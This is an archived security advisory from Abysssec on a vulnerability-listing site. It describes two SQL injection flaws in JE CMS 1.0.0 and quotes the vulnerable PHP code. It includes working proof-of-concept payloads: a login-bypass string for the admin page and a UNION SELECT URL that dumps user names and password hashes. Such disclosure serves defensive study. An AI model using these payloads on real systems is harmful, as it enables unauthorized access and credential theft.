Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0: Posted Sep 29, 2010; Authored by Abysssec | Site abysssec.com; Month Of Abysssec Undisclosed Bugs - JE CMS version 1.0.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.; tags | exploit, remote, sql injection; SHA-256 | 24a8b84dfdb9146940e4293b16fbe2a2f0ce1c2394f0d532cd9e82bb69f7e65f; Download | Favorite | View

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
'''
 
  
Title  : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
Vendor  Site   : joenasejes.cz.cc
Discovery : abysssec.com
   
  
Vulnerabilites :
 
1. Bypass Authentication by SQL Injection Vulnerability
 
in administrator\login.php page, lines 16-20:
if (isset($_REQUEST['username'])) {
    $username = $_REQUEST['username'];
    $password = $_REQUEST['password'];
    $result = $core->userLogin();
     
     
userLogin() function is in administrator\library\functions.php. in lines 129-139:
        if ($userName == '' || $password == '') {
            $errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
        }  else {
            // check the database and see if the username and password combo do match
            $sql = "SELECT userid
                    FROM users
                    WHERE username = '".$userName."'        // vulnerability is here
                    AND password = '".$this->getHash($password)."'   // vulnerability is here
                    AND usertype = 1
                    AND block = 0";
            $result = $this->JEQuery($sql);
 
POC:
 
in administrator/login.php:
 
username: admin' or '1'='1
password: admin' or '1'='1
 
2. SQL injection in administrator\index.php on "userid" parameter:
 
in administrator\index.php file line 12:
$userid         =   $_REQUEST['userid'];
lines 52-53:
    case 'edituser' :
        $user = $core->getUser($userid);
         
getUser function is in administrator\library\functions.php file. lines 578-583:
 
    function getUser($id){
         
        $sql = "SELECT *
                FROM users
                WHERE userid = ".$id;   // vulnerability is here
        $result = $this->JEQuery($sql);
 
POC:
 
http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--

Top Authors In Last 30 Days

Red Hat 270 files
indoushka 152 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Debian 27 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

Share This

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems